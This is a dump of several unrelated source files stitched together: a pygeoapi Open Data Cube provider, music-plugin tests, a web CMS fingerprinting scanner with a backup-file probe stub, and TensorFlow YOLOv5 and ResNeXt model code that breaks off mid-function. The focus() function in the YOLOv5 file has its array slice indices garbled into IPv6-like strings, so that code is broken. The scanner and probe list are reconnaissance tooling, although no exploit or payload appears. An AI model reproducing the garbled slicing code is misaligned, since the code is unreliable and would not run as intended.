return self.gen_covjson(out_meta, dataset)
elif format_.lower() == 'geotiff':
LOGGER.info('Returning data as GeoTIFF')
# ToDo: check if there is more than one time slice
out_meta['driver'] = 'GTiff'
out_meta['crs'] = self.crs_obj.to_epsg()
out_meta['dtype'] = self._measurement_properties[0]['dtype']
out_meta['nodata'] = self._measurement_properties[0]['nodata']
out_meta['count'] = len(bands)
out_meta['transform'] = Affine(self._coverage_properties['resx'],
0.0,
minx,
0.0,
self._coverage_properties['resy'],
maxy)
LOGGER.debug("out_meta:\n{}".format(json.dumps(out_meta, indent=4)))
LOGGER.debug('Writing to in-memory file')
with MemoryFile() as memfile:
with memfile.open(**out_meta) as dest:
# input is expected as (bands, rows, cols)
dest.write(np.stack(
[dataset.squeeze(dim='time', drop=True)[band].values for band in bands],
axis=0)
)
LOGGER.debug('Finished writing to in-memory file')
return memfile.read()
else:
LOGGER.info('Returning data as netCDF')
# ToDo: what if different measurements have different dtypes?
for data_var in dataset.data_vars:
dtype = dataset[data_var].dtype.name
break
# scipy cannot save arrays with unsigned type to netCDF
if dtype.startswith('u'):
dataset = dataset.astype(CAST_MAP[dtype], copy=False)
# Note: "If no path is provided, this function returns the resulting netCDF file as bytes; in this case,
# we need to use scipy, which does not support netCDF version 4 (the default format becomes NETCDF3_64BIT)."
# (http://xarray.pydata.org/en/stable/generated/xarray.Dataset.to_netcdf.html)
# ToDo: implement netCDF version 4 option using in-memory file with lib netCDF4
# (http://unidata.github.io/netcdf4-python/#in-memory-diskless-datasets)
# see also https://stackoverflow.com/questions/46433812/simple-conversion-of-netcdf4-dataset-to-xarray-dataset
return dataset.to_netcdf()
def gen_covjson(self, metadata, dataset):
"""
Generate coverage as CoverageJSON representation
:param metadata: coverage metadata
:param dataset: xarray Dataset object
:returns: dict of CoverageJSON representation
"""
# ToDo: support time dimension
LOGGER.info('Creating CoverageJSON domain')
minx, miny, maxx, maxy = metadata['bbox']
cj = {
'type': 'Coverage',
'domain': {
'type': 'Domain',
'domainType': 'Grid',
'axes': {
'x': {
'start': minx,
'stop': maxx,
'num': metadata['width']
},
'y': {
'start': miny,
'stop': maxy,
'num': metadata['height']
}
},
'referencing': [{
'coordinates': ['x', 'y'],
'system': {
'type': self._coverage_properties['crs_type'],
'id': self._coverage_properties['crs_uri']
}
}]
},
'parameters': {},
'ranges': {}
}
bands_select = metadata['bands']
LOGGER.info('bands selected: {}'.format(bands_select))
for bs in bands_select:
parameter = {
'type': 'Parameter',
'description': bs,
'unit': {
'symbol': dataset[bs].attrs['units']
},
'observedProperty': {
'id': bs,
'label': {
'en': bs
}
}
}
cj['parameters'][bs] = parameter
# ToDo: check shape/axis order!
try:
for key in cj['parameters'].keys():
cj['ranges'][key] = {
'type': 'NdArray',
'dataType': str(dataset[key].dtype),
'axisNames': ['y', 'x'],
'shape': [metadata['height'], metadata['width']],
}
cj['ranges'][key]['values'] = dataset[key].values.flatten().tolist()
except IndexError as err:
LOGGER.warning(err)
raise ProviderQueryError('Invalid query parameter')
return cj
def get_coverage_domainset(self):
"""
Provide coverage domainset
:returns: CIS JSON object of domainset metadata
"""
# The grid may be very large and contain a lot of nodata values.
# Does the (draft) spec of API Coverages provide means to indicate where useful data is actually?
domainset = {
'type': 'DomainSet',
'generalGrid': {
'type': 'GeneralGridCoverage',
'srsName': self._coverage_properties['crs_uri'],
'axisLabels': [
self._coverage_properties['x_axis_label'],
self._coverage_properties['y_axis_label']
],
'axis': [{
'type': 'RegularAxis',
'axisLabel': self._coverage_properties['x_axis_label'],
'lowerBound': self._coverage_properties['bbox'][0],
'upperBound': self._coverage_properties['bbox'][2],
'uomLabel': self._coverage_properties['bbox_units'],
'resolution': self._coverage_properties['resx']
}, {
'type': 'RegularAxis',
'axisLabel': self._coverage_properties['y_axis_label'],
'lowerBound': self._coverage_properties['bbox'][1],
'upperBound': self._coverage_properties['bbox'][3],
'uomLabel': self._coverage_properties['bbox_units'],
'resolution': self._coverage_properties['resy']
}],
'gridLimits': {
'type': 'GridLimits',
'srsName': 'http://www.opengis.net/def/crs/OGC/0/Index2D',
'axisLabels': ['i', 'j'],
'axis': [{
'type': 'IndexAxis',
'axisLabel': 'i',
'lowerBound': 0,
'upperBound': self._coverage_properties['width']
}, {
'type': 'IndexAxis',
'axisLabel': 'j',
'lowerBound': 0,
'upperBound': self._coverage_properties['height']
}]
}
},
}
return domainset
def get_coverage_rangetype(self):
"""
Provide coverage rangetype
:returns: CIS JSON object of rangetype metadata
"""
fields = []
for row in range(0, len(self._measurement_properties)):
fields.append({
"id": self._measurement_properties[row]['id'],
"type": "Quantity",
"name": self._measurement_properties[row]['name'],
# "definition": "http://opengis.net/def/property/OGC/0/Radiance", # ToDo: get correct definition (semantics) for arbitrary fields
"nodata": self._measurement_properties[row]['nodata'],
"uom": {
# "id": "http://www.opengis.net/def/uom/UCUM/[C]", # ToDo: get correct uri for arbitrary units
"type": "UnitReference",
"code": self._measurement_properties[row]['unit']
},
"encodingInfo": {
"dataType": TYPE_URI_MAP[self._measurement_properties[row]['dtype']] or self._measurement_properties[row]['dtype']
},
"_meta": {
"tags": {
"Aliases": self._measurement_properties[row]['aliases']
if self._measurement_properties[row]['aliases'] is not None else "NaN",
}
}
})
rangetype = {
"type": "DataRecord",
"field": fields
}
return rangetype
def _get_bbox(self) -> BoundingBox:
bbox = self.dc.bbox_of_product(self.data)
LOGGER.info('bbox of product {}: {}'.format(self.data, bbox))
return bbox
def _get_coverage_properties(self, bbox: BoundingBox) -> dict:
"""
Helper function to normalize coverage properties
:returns: `dict` of coverage properties
"""
# Note that in Open Data Cube:
# - some metadata are specified on product level and some on dataset level or even on both (e.g. crs)
# - some product level metadata are optional, thus they may not be available for all products
# - different datasets for the same product may have different crs
# - different datasets for the same product or different measurements within one dataset may have different resolutions
# ------------------------------- #
# Get metadata and do some checks #
# ------------------------------- #
crs_set = self.dc.get_crs_set(self.data)
resolution_set = self.dc.get_resolution_set(self.data)
bbox = self._get_bbox()
if len(crs_set) > 1:
LOGGER.warning("Product {} has datasets with different coordinate reference systems. "
"All datasets will be assumed to have WGS84 as native crs from now on.".format(self.data))
self.crs_obj = CRS_DATACUBE('epsg:4326')
else:
self.crs_obj = next(iter(crs_set))
if len(resolution_set) > 1:
msg = "Product {} has datasets with different spatial resolutions. This is not supported yet. " \
"Please check and change your Open Data Cube dataset definitions.".format(self.data)
LOGGER.warning(msg)
raise ProviderQueryError(msg)
else:
res = next(iter(resolution_set))
resx = resx_native = res[0]
resy = resy_native = res[1]
# Resolution has to be converted if ODC storage crs and collection crs differ and ODC storage crs is projected.
# We assume there is no mixture of geographic and projected reference systems in the datasets.
# Conversion:
# 1° difference in latitude and longitude - for longitude this is only true at the equator;
# the distance is short when moving towards the poles - is approx. 111 km. We apply a simple conversion
# using the factor 100,000 to obtain a reasonable grid.
# ToDo: review the conversion from meter to degree
if len(crs_set) > 1 and next(iter(crs_set)).projected:
resx = meter2degree(resx_native)
resy = meter2degree(resy_native)
LOGGER.warning("Using WGS84 instead of storage crs. "
"Resolution is converted from {} to {}".format((resx_native, resy_native), (resx, resy)))
# ToDo: support different crs/resolution for different datasets including reprojection
# and resampling (need to wait for API Coverages spec extensions)
# -------------- #
# Set properties #
# -------------- #
properties = {
'bbox': [
bbox.left,
bbox.bottom,
bbox.right,
bbox.top
],
'crs_uri': 'http://www.opengis.net/def/crs/OGC/1.3/CRS84',
'crs_type': 'GeographicCRS',
'bbox_units': 'deg',
'x_axis_label': 'Lon',
'y_axis_label': 'Lat',
'width': abs((bbox.right - bbox.left) / abs(resx)),
'height': abs((bbox.top - bbox.bottom) / abs(resy)),
'resx': resx,
'resy': resy,
'num_bands': (self.dc.number_of_bands(self.data)),
}
if self.crs_obj.projected:
properties['crs_uri'] = 'http://www.opengis.net/def/crs/EPSG/9.8.15/{}'.format(self.crs_obj.to_epsg())
properties['x_axis_label'] = 'x'
properties['y_axis_label'] = 'y'
properties['bbox_units'] = self.crs_obj.units[0]
properties['crs_type'] = 'ProjectedCRS'
properties['axes'] = [
properties['x_axis_label'], properties['y_axis_label']
]
return properties
def _get_measurement_properties(self):
"""
Helper function to normalize measurement properties
:returns: `dict` of measurement properties
"""
measurement_list = self.dc.list_measurements()
measurement_metadata = measurement_list.loc[self.data]
properties = []
for row in range(0, len(measurement_metadata)):
# for netCDF unsigned dtypes are not possible at the moment due to limitations of xarray.Dataset.to_netcdf()
dtype = measurement_metadata.iloc[row]['dtype']
if self.native_format.lower() == 'netcdf' and dtype.startswith('u'):
dtype = CAST_MAP[dtype]
aliases = None
if 'aliases' in measurement_metadata.columns and isinstance(measurement_metadata.iloc[row]['aliases'], list):
aliases = measurement_metadata.iloc[row]['aliases']
properties.append({
"id": row + 1,
"name": measurement_metadata.iloc[row]['name'],
"dtype": dtype,
"nodata": measurement_metadata.iloc[row]['nodata'],
"unit": measurement_metadata.iloc[row]['units'],
"aliases": aliases,
})
return properties
```
#### File: src/odcprovider/records.py
```python
import datetime
import logging
from datacube.model import DatasetType
from .connector import OdcConnector
from .utils import convert_datacube_bbox_to_geojson_wgs84_polygon
from pygeoapi.provider.base import (BaseProvider,
ProviderQueryError)
LOGGER = logging.getLogger(__name__)
class OpenDataCubeRecordsProvider(BaseProvider):
"""
OGC API Records provider for an OpenDataCube instance
This provider MUST be used in its own pygeoapi collection and not as part of
an already existing data containing collection.
"""
def __init__(self, provider_def):
"""
Initialize the OpenDataCubeRecordsProvider
:param provider_def: provider definition
:returns odcprovider.OpenDataCubeRecordsProvider
"""
super().__init__(provider_def)
self.dc = OdcConnector()
LOGGER.debug("Provider initiated: name: '{}', type: '{}', data: '{}'".format(self.name, self.type, self.data))
def query(self, startindex=0, limit=10, resulttype='results',
bbox=[], datetime_=None, properties=[], sortby=[],
select_properties=[], skip_geometry=False, q=None, **kwargs):
"""
query OpenDataCube products
:param startindex: starting record to return (default 0)
:param limit: number of records to return (default 10)
:param resulttype: return results or hit limit (default results)
:param bbox: bounding box [minx,miny,maxx,maxy]
:param datetime_: temporal (datestamp or extent)
:param properties: list of tuples (name, value)
:param sortby: list of dicts (property, order)
:param select_properties: list of property names
:param skip_geometry: bool of whether to skip geometry (default False)
:param q: full-text search term(s)
:returns: dict of 0..n GeoJSON feature collection
"""
# {
# 'id': 1,
# 'name': 'dsm__MB__The_Pas_2014',
# 'description': '"dsm" data created by "MB" within the project "The_Pas_2014"',
# 'creation_time': None,
# 'format': None,
# 'label': None,
# 'lat': None,
# 'lon': None,
# 'time': None,
# 'platform': None,
# 'instrument': None,
# 'region_code': None,
# 'product_family': None,
# 'dataset_maturity': None,
# 'crs': 'EPSG:2957',
# 'spatial_dimensions': ('y', 'x'),
# 'tile_size': None,
# 'resolution': (-1.0, 1.0)
# }
#
# ToDo list datasets or measurements?
if limit < 1:
raise ProviderQueryError("limit < 1 makes no sense!")
if startindex < 0:
raise ProviderQueryError("startIndex < 0 makes no sense!")
features = [self._encode_dataset_type_as_record(self.dc.get_product_by_id(product)) for product in self.dc.list_product_names()]
# apply limit and start index
all_count = len(features)
if len(features) > limit:
features = features[startindex:(startindex+limit)]
feature_collection = {
'type': 'FeatureCollection',
'timestamp': datetime.datetime.utcnow().isoformat(),
'numberMatched': all_count,
'numberReturned': len(features),
'features': features
}
if resulttype == 'hit limit':
return len(features)
else:
return feature_collection
def get(self, identifier, **kwargs):
"""
Get OpenDataCube product family by id
:param identifier: family id
:returns: `dict` of single record
"""
LOGGER.debug('Fetching identifier {}'.format(identifier))
return self._encode_dataset_type_as_record(self.dc.get_product_by_id(identifier), is_item=True)
def _encode_dataset_type_as_record(self, product: str, is_item: bool = False) -> dict:
bbox = self.dc.wgs84_bbox_of_product(product.name)
record = {
'id': product.name,
'type': 'Feature',
'geometry': {
'type': 'Polygon',
'coordinates': [[
[bbox.left, bbox.top],
[bbox.right, bbox.top],
[bbox.right, bbox.bottom],
[bbox.left, bbox.bottom],
[bbox.left, bbox.top]
]]
},
'properties': self._encode_dataset_type_properties(product, is_item=is_item)
}
return record
def _encode_dataset_type_properties(self, product: str, is_item: bool = False) -> dict:
properties = {}
# properties from metadata doc
properties_to_skip = ['links']
for metadata_key in product.metadata_doc.keys():
if metadata_key not in properties_to_skip:
property = product.metadata_doc.get(metadata_key)
if isinstance(property, dict) and 'name' in property.keys():
properties.update({metadata_key: product.metadata_doc.get(metadata_key).get('name')})
elif isinstance(property, list):
properties.update({metadata_key: property})
elif metadata_key == 'links' and \
isinstance(product.metadata_doc.get(metadata_key), list) and \
len(product.metadata_doc.get(metadata_key)) > 0 and \
is_item:
# add links to associations entry
links = []
for link in product.metadata_doc.get(metadata_key):
links.append({
'href': link.get('href'),
'hreflang': link.get('hreflang'),
'rel': link.get('rel'),
'title': link.get('title'),
'type': link.get('type')
})
self._add_resource_associations(links, product.name)
properties.update({
'associations': links
})
# properties derived via datacube.utils.documents.DocReader
properties.update(product.metadata.fields)
return properties
def _add_resource_associations(self, links: list, name: str) -> None:
types_format_map = {
'application/geo+json': 'json',
'application/ld+json': 'jsonld',
'text/html': 'html'
}
for key, value in types_format_map.items():
links.append({
'rel': 'item',
'href': '../../{}?f={}'.format(name, value),
'type': key,
'title': name
})
``` |
{
"source": "52Sarah/play-song",
"score": 3
} |
#### File: play-song/tests/test_playsongby.py
```python
from __future__ import print_function, unicode_literals
import os
import os.path
import nose.tools as nose
from tests.utils import run_filter
def test_query_ignore_case():
"""should ignore case when querying songs by an artist"""
results = run_filter('playsongby', 'tokens')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_query_trim_whitespace():
"""should trim whitespace when querying songs by an artist"""
results = run_filter('playsongby', ' tokens ')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_query_partial():
"""should match partial queries when querying songs by an artist"""
results = run_filter('playsongby', 'oken')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_result_title():
"""songby result should display songby name in title"""
results = run_filter('playsongby', 'tokens')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_result_subtitle():
"""songby result should display artist name in subtitle"""
results = run_filter('playsongby', 'tokens')
nose.assert_equal(results[0]['subtitle'], 'The Tokens')
def test_result_valid():
"""songby result should be actionable"""
results = run_filter('playsongby', 'beatl')
nose.assert_equal(results[0]['valid'], 'yes')
def test_result_artwork():
"""songby result should display correct artwork as icon"""
results = run_filter('playsongby', 'light o')
nose.assert_true(
os.path.isabs(results[0]['icon']['path']),
'artwork path is not an absolute path')
nose.assert_true(
os.path.exists(results[0]['icon']['path']),
'artwork path does not exist')
def test_no_results():
"""should return 'No Results Found' in the case of no song results"""
results = run_filter('playsongby', 'zxy')
nose.assert_equal(results[0]['title'], 'No Results Found')
nose.assert_equal(results[0]['subtitle'], 'No songs matching \'zxy\'')
nose.assert_equal(results[0]['valid'], 'no')
nose.assert_equal(results[0]['icon']['path'],
'resources/icon-noartwork.png')
nose.assert_equal(len(results), 1)
``` |
{
"source": "530393297/bugscan",
"score": 3
} |
#### File: lib/core/webdna.py
```python
import sys, os, json, asyncio, hashlib, aiohttp
class CMSError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Webdna:
def __init__(self, url):
filename = os.path.join(sys.path[0], "data", "data.json")
fp = open(filename)
self.j = json.load(fp)
self.url = url
self.loop = None
fp.close()
def getmd5(self, body):
m2 = hashlib.md5()
m2.update(body)
return m2.hexdigest()
async def whatweb(self, d, scode):
if d["md5"]:
md5 = self.getmd5(scode)
if (md5 == d["md5"]):
print(d)
raise CMSError(d)
else:
re = d["re"]
if (scode.decode("utf-8", "ignore").find(re) != -1):
print(d)
raise CMSError(d)
async def fetch(self, d, session):
_url = self.url
url = _url + d["url"]
async with session.get(url, timeout=10) as response:
status = response.status
if status != 200:
return False
scode = await response.read()
if not scode:
return
await self.whatweb(d, scode)
async def run1(self):
# Fetch all responses within one Client session,
# keep connection alive for all requests.
async with aiohttp.ClientSession() as session:
tasks = []
for d in self.j:
task = asyncio.ensure_future(self.fetch(d, session))
tasks.append(task)
await asyncio.gather(*tasks)
# you now have all response bodies in this variable
# print(responses)
def run(self):
loop = asyncio.get_event_loop()
self.loop = loop
result = {}
try:
future = asyncio.ensure_future(self.run1())
loop.run_until_complete(future)
except CMSError as e:
result = str(e)
# print(e)
self.loop.stop()
except Exception as e:
print(e)
return result
```
#### File: bugscan/script/bakscan.py
```python
DIR_PROBE_EXTS = ['.tar.gz', '.zip', '.rar', '.tar.bz2'] #文件夹后缀
FILE_PROBE_EXTS = ['.bak', '.swp', '.1'] #文件路径
class Spider:
def run(self,url,html):
pass
``` |
{
"source": "530824679/2D_ObjectDetect",
"score": 3
} |
#### File: 2D_ObjectDetect/model/basenet.py
```python
import tensorflow as tf
def bn(input):
with tf.variable_scope('bn'):
gamma=tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='weight',trainable=False)
beta = tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='bias',trainable=False)
mean = tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='running_mean',trainable=False)
var = tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='running_var',trainable=False)
out = tf.nn.batch_normalization(input, mean, var, beta, gamma,variance_epsilon=0.001)
return out
def conv(input, out_channels, ksize, stride, name='conv', add_bias=False):
filter = tf.Variable(tf.random_normal(shape=[ksize, ksize, input.shape[-1].value, out_channels]), name=name+'/weight', trainable=False)
if ksize > 1:
pad_h, pad_w = ksize//2, ksize//2
paddings = tf.constant([[0, 0], [pad_h, pad_h], [pad_w, pad_w], [0, 0]])
input = tf.pad(input, paddings, 'CONSTANT')
net = tf.nn.conv2d(input, filter, [1,stride, stride, 1], padding="VALID")
if add_bias:
bias = tf.Variable(tf.random_normal(shape=[out_channels]), name=name + '/bias',trainable=False)
net = tf.nn.bias_add(net,bias)
return net
def convBnLeakly(input, out_channels, ksize, stride, name):
with tf.variable_scope(name):
net = conv(input, out_channels, ksize, stride)
net = bn(net)
# swish
# net=tf.nn.sigmoid(net)*net
# v2.0
# net=tf.nn.leaky_relu(net,alpha=0.1)
# v3.0
net = net * tf.nn.relu6(net + 3.0) / 6.0
return net
def focus(input, out_channels, ksize, name):
s1 = input[:, fc00:e968:6179::de52:7100, fc00:e968:6179::de52:7100, :]
s2 = input[:, fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b, fc00:e968:6179::de52:7100, :]
s3 = input[:, fc00:e968:6179::de52:7100, fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b, :]
s4 = input[:, fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b, fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b, :]
net = tf.concat([s1, s2, s3, s4], axis=-1)
net = convBnLeakly(net, out_channels, ksize, 1, name+'/conv')
return net
def bottleneck(input, c1, c2, shortcut, e, name):
with tf.variable_scope(name):
net = convBnLeakly(input,int(c2 * e), 1, 1, 'cv1')
net = convBnLeakly(net, c2, 3, 1, 'cv2')
if (shortcut and c1==c2):
net += input
return net
def bottleneckCSP(input, c1, c2, n, shortcut, e, name):
c_ = int(c2 * e)
with tf.variable_scope(name):
net1 = convBnLeakly(input, c_, 1, 1, 'cv1')
for i in range(n):
net1 = bottleneck(net1, c_, c_, shortcut, 1.0, name='m/%d'%i)
net1 = conv(net1, c_, 1, 1, name='cv3')
net2 = conv(input, c_, 1, 1, 'cv2')
net = tf.concat((net1, net2), -1)
net = bn(net)
net = tf.nn.leaky_relu(net, alpha=0.1)
net = convBnLeakly(net, c2, 1, 1, 'cv4')
return net
def spp(input, c1, c2, k1, k2, k3, name):
c_ = c1//2
with tf.variable_scope(name):
net = convBnLeakly(input, c_, 1, 1, 'cv1')
net1 = tf.nn.max_pool(net, ksize=[1, k1, k1, 1], strides=[1, 1, 1, 1], padding="SAME")
net2 = tf.nn.max_pool(net, ksize=[1, k2, k2, 1], strides=[1, 1, 1, 1], padding="SAME")
net3 = tf.nn.max_pool(net, ksize=[1, k3, k3, 1], strides=[1, 1, 1, 1], padding="SAME")
net = tf.concat((net, net1, net2, net3), -1)
net = convBnLeakly(net, c2, 1, 1, 'cv2')
return net
```
#### File: 2D_ObjectDetect/model/network.py
```python
import numpy as np
import tensorflow as tf
from cfg.config import *
from model.basenet import *
from utils.data_utils import *
class Network(object):
def __init__(self, is_train):
self.is_train = is_train
self.anchors = read_anchors(path_params['anchor_file'])
self.classes = read_class_names(path_params['class_file'])
self.class_num = len(self.classes)
self.strides = np.array(model_params['strides'])
self.anchor_per_scale = model_params['anchor_per_scale']
def forward(self, inputs):
try:
conv_lbbox, conv_mbbox, conv_sbbox = self.build_network(inputs)
except:
raise NotImplementedError("Can not build up yolov5 network!")
with tf.variable_scope('pred_sbbox'):
pred_sbbox = self.reorg_layer(conv_sbbox, self.anchors[0], self.strides[0])
with tf.variable_scope('pred_mbbox'):
pred_mbbox = self.reorg_layer(conv_mbbox, self.anchors[1], self.strides[1])
with tf.variable_scope('pred_lbbox'):
pred_lbbox = self.reorg_layer(conv_lbbox, self.anchors[2], self.strides[2])
logits = [conv_sbbox, conv_mbbox, conv_lbbox]
preds = [pred_sbbox, pred_mbbox, pred_lbbox]
return logits, preds
def build_network(self, inputs):
# backbone
focus_0 = focus(inputs, 64, 3, 'model/0')
conv_1 = convBnLeakly(focus_0, 128, 3, 2, "model/1")
bottleneck_csp_2 = bottleneckCSP(conv_1, 128, 128, 3, True, 0.5, "model/2")
conv_3 = convBnLeakly(bottleneck_csp_2, 256, 3, 2, 'model/3')
bottleneck_csp_4 = bottleneckCSP(conv_3, 256, 256, 9, True, 0.5, 'model/4')
conv_5 = convBnLeakly(bottleneck_csp_4, 512, 3, 2, 'model/5')
bottleneck_csp_6 = bottleneckCSP(conv_5, 512, 512, 9, True, 0.5, 'model/6')
conv_7 = convBnLeakly(bottleneck_csp_6, 1024, 3, 2, 'model/7')
spp_8 = spp(conv_7, 1024, 1024, 5, 9, 13, 'model/8')
# neck
bottleneck_csp_9 = bottleneckCSP(spp_8, 1024, 1024, 3, False, 0.5, 'model/9')
conv_10 = convBnLeakly(bottleneck_csp_9, 512, 1, 1, 'model/10')
shape = [conv_10.shape[1].value * 2, conv_10.shape[2].value * 2]
# 0:双线性差值。1:最近邻居法。2:双三次插值法。3:面积插值法
deconv_11 = tf.image.resize_images(conv_10, shape, method=1)
concat_12 = tf.concat((deconv_11, bottleneck_csp_6), -1)
bottleneck_csp_13 = bottleneckCSP(concat_12, 1024, 512, 3, False, 0.5, 'model/13')
conv_14 = convBnLeakly(bottleneck_csp_13, 256, 1, 1, 'model/14')
shape = [conv_14.shape[1].value * 2, conv_14.shape[2].value * 2]
deconv_15 = tf.image.resize_images(conv_14, shape, method=1)
concat_16 = tf.concat((deconv_15, bottleneck_csp_4), -1)
bottleneck_csp_17 = bottleneckCSP(concat_16, 512, 256, 3, False, 0.5, 'model/17')
conv_18 = convBnLeakly(bottleneck_csp_17, 256, 3, 2, 'model/18')
concat_19 = tf.concat((conv_18, conv_14), -1)
bottleneck_csp_20 = bottleneckCSP(concat_19, 512, 512, 3, False, 0.5, 'model/20')
conv_21 = convBnLeakly(bottleneck_csp_20, 512, 3, 2, 'model/21')
concat_22 = tf.concat((conv_21, conv_10), -1)
bottleneck_csp_23 = bottleneckCSP(concat_22, 1024, 1024, 3, False, 0.5, 'model/23')
# head
conv_24_m0 = conv(bottleneck_csp_17, 3 * (self.class_num + 5), 1, 1, 'model/24/m/0', add_bias=True)
conv_24_m1 = conv(bottleneck_csp_20, 3 * (self.class_num + 5), 1, 1, 'model/24/m/1', add_bias=True)
conv_24_m2 = conv(bottleneck_csp_23, 3 * (self.class_num + 5), 1, 1, 'model/24/m/2', add_bias=True)
return conv_24_m0, conv_24_m1, conv_24_m2
def reorg_layer(self, feature_maps, anchors, strides):
"""
解码网络输出的特征图
:param feature_maps:网络输出的特征图
:param anchors:当前层使用的anchor尺度
:param stride:特征图相比原图的缩放比例
:return: 预测层最终的输出 shape=[batch_size, feature_size, feature_size, anchor_per_scale, 5 + class_num]
"""
feature_shape = tf.shape(feature_maps)[1:3]
batch_size = tf.shape(feature_maps)[0]
anchor_per_scale = len(anchors)
predict = tf.reshape(feature_maps, (batch_size, feature_shape[0], feature_shape[1], anchor_per_scale, 5 + self.class_num))
conv_raw_xy = predict[:, :, :, :, 0:2]
conv_raw_wh = predict[:, :, :, :, 2:4]
conv_raw_conf = predict[:, :, :, :, 4:5]
conv_raw_prob = predict[:, :, :, :, 5:]
y = tf.tile(tf.range(feature_shape[0], dtype=tf.int32)[:, tf.newaxis], [1, feature_shape[0]])
x = tf.tile(tf.range(feature_shape[1], dtype=tf.int32)[tf.newaxis, :], [feature_shape[1], 1])
xy_cell = tf.concat([x[:, :, tf.newaxis], y[:, :, tf.newaxis]], axis=-1)
xy_cell = tf.tile(xy_cell[tf.newaxis, :, :, tf.newaxis, :], [batch_size, 1, 1, anchor_per_scale, 1])
xy_cell = tf.cast(xy_cell, tf.float32)
bboxes_xy = (tf.sigmoid(conv_raw_xy) + xy_cell) * strides
bboxes_wh = (tf.sigmoid(conv_raw_wh) * anchors) * strides
pred_xywh = tf.concat([bboxes_xy, bboxes_wh], axis=-1)
pred_box_confidence = tf.sigmoid(conv_raw_conf)
pred_box_class_prob = tf.sigmoid(conv_raw_prob)
return tf.concat([pred_xywh, pred_box_confidence, pred_box_class_prob], axis=-1)
``` |
{
"source": "530824679/AbnormalBehaviorRecognition",
"score": 3
} |
#### File: 530824679/AbnormalBehaviorRecognition/model.py
```python
import numpy as np
from ops import *
"""
So, the total number of layers is (3*blokcs)*residual_layer_num + 2
because, blocks = split(conv 2) + transition(conv 1) = 3 layer
and, first conv layer 1, last dense layer 1
thus, total number of layers = (3*blocks)*residual_layer_num + 2
"""
class Network():
def __init__(self, num_classes, is_train, reduction_ratio, block, cardinality, depth):
self.is_train = is_train
self.num_classes = num_classes
self.reduction_ratio = reduction_ratio
self.block = block # res block (split + transition)
self.cardinality = cardinality # split number
self.depth = depth # out channel
def first_layer(self, input, scope):
with tf.name_scope(scope):
net = ConvLayer(input, filter=64, kernel=[3, 3], stride=1, scope=scope+'_conv1')
net = BatchNormalization(net, is_train=self.is_train, scope=scope+'_batch1')
net = Relu(net, scope=scope+'_relu1')
return net
def squeeze_excitation_layer(self, input, out_dim, ratio, scope):
"""
Squeeze Excitation
arguments:
input(tf.Tensor): a 4D tensor
4D tensor with shape:
`(batch_size, channels, rows, cols)`
out_dim: input channels num
ratio: full connect reduction ratio
:return: tf.Tensor: input of global infomation. input*excitation
"""
with tf.name_scope(scope):
squeeze = GlobalAveragePool(input)
excitation = Fully_connected(squeeze, num_classes=out_dim / ratio, scope=scope+'_fully_connected1')
excitation = Relu(excitation, scope=scope+'_relu')
excitation = Fully_connected(excitation, num_classes=out_dim, scope=scope+'_fully_connected2')
excitation = Sigmoid(excitation)
excitation = tf.reshape(excitation, [-1, 1, 1, out_dim])
scale = input * excitation
return scale
def transform_layer(self, input, stride, scope):
with tf.name_scope(scope):
net = ConvLayer(input, filter=self.depth, kernel=[1, 1], stride=1, scope=scope + '_conv1')
net = BatchNormalization(net, is_train=self.is_train, scope=scope + '_batch1')
net = Relu(net, scope=scope + '_relu1')
net = ConvLayer(net, filter=self.depth, kernel=[3, 3], stride=stride, scope=scope + '_conv2')
net = BatchNormalization(net, is_train=self.is_train, scope=scope + '_batch2')
net = Relu(net, scope=scope + '_relu2')
return net
def split_layer(self, input, stride, scope):
with tf.name_scope(scope):
layers_split = list()
for i in range(self.cardinality):
splits = self.transform_layer(input, stride=stride, scope=scope + '_splitN_' + str(i))
layers_split.append(splits)
return Concat(layers_split)
def transition_layer(self, input, out_dim, scope):
with tf.name_scope(scope):
net = ConvLayer(input, filter=out_dim, kernel=[1, 1], stride=1, scope=scope+'_conv1')
net = BatchNormalization(net, is_train=self.is_train, scope=scope+'_batch1')
return net
def residual_layer(self, input, out_dim, layer_num, res_block=3):
# split + transform + transition + merge
for i in range(res_block):
input_dim = int(np.shape(input)[-1])
if input_dim * 2 == out_dim:
flag = True
stride = 2
channel = input_dim // 2
else:
flag = False
stride = 1
net = self.split_layer(input, stride=stride, scope='split_layer_'+layer_num+'_'+str(i))
net = self.transition_layer(net, out_dim=out_dim, scope='trans_layer_'+layer_num+'_'+str(i))
net = self.squeeze_excitation_layer(net, out_dim=out_dim, ratio=self.reduction_ratio, scope='squeeze_layer_'+layer_num+'_'+str(i))
if flag is True:
pad_input_x = AveragePool(input)
pad_input_x = tf.pad(pad_input_x, [[0, 0], [0, 0], [0, 0], [channel, channel]])
else:
pad_input_x = input
output = Relu(net + pad_input_x, scope='residual_relu_layer_'+layer_num)
return output
def build_network(self, input):
net = self.first_layer(input, scope='first_layer')
net = self.residual_layer(net, out_dim=64, layer_num='res_1', res_block=self.block)
net = self.residual_layer(net, out_dim=128, layer_num='res_2', res_block=self.block)
net = self.residual_layer(net, out_dim=256, layer_num='res_3', res_block=self.block)
net = GlobalAveragePool(net)
net = flatten(net)
net = Fully_connected(net, num_classes=self.num_classes, scope='fully_connected')
return net
```
#### File: 530824679/AbnormalBehaviorRecognition/ops.py
```python
import tensorflow as tf
from tensorflow.contrib.layers import batch_norm, flatten
from tensorflow.contrib.framework import arg_scope
def ConvLayer(input, filter, kernel, stride, padding='SAME', scope="conv"):
with tf.name_scope(scope):
return tf.layers.conv2d(inputs=input,
use_bias=False,
filters=filter,
kernel_size=kernel,
strides=stride,
padding=padding)
def AveragePool(input, pool_size=[2, 2], stride=2, padding='SAME', scope="average_pool"):
with tf.name_scope(scope):
return tf.layers.average_pooling2d(inputs=input,
pool_size=pool_size,
